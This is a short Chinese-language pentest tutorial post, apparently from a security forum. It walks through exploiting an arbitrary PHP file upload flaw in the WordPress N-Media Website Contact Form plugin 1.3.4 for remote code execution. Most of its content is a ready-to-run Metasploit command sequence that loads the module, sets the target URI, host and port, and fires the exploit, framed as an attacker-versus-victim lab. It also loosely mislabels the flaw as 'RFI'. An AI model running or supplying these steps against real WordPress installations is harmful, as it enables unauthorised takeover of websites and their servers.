渗透测试实战:WordPress N-Media网站联系表格插件存在文件上传漏洞【附上利用方法】

此模块利用WordPress N-Media网站联系表单插件1.3.4版中的任意PHP代码文件上传。该漏洞允许任意文件上传和远程代码执行(RFI)。
利用目标
WordPress N-Media网站联系方式表单插件1.34
需求
攻击者:kali Linux
受害者PC:已安装WordPress
打开Kali终端类型  msfconsole
WordPress N-Media网站联系表格插件存在文件上传漏洞
现在输入  exploit use / unix / webapp / wp_nmediawebsite_file_upload
msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress
msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_nmediawebsite_file_upload)>set rport 80
msf exploit (wp_nmediawebsite_file_upload)>exploit
WordPress N-Media网站联系表格插件存在文件上传漏洞
转载请注明本文链接: http://www.mayidui.net/t2313.html
游客
登录后才可以回帖,登录 或者 注册